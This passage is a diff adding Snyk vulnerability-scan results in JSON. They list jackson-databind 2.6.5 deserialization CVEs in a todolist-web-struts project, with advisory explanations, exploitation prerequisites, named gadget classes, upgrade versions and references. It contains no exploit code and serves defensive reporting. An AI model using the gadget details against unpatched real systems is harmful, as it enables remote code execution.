sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-14060) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-14061) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-14439) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n# References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-24616) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-12022) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-11307) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-12023) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-14718) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could 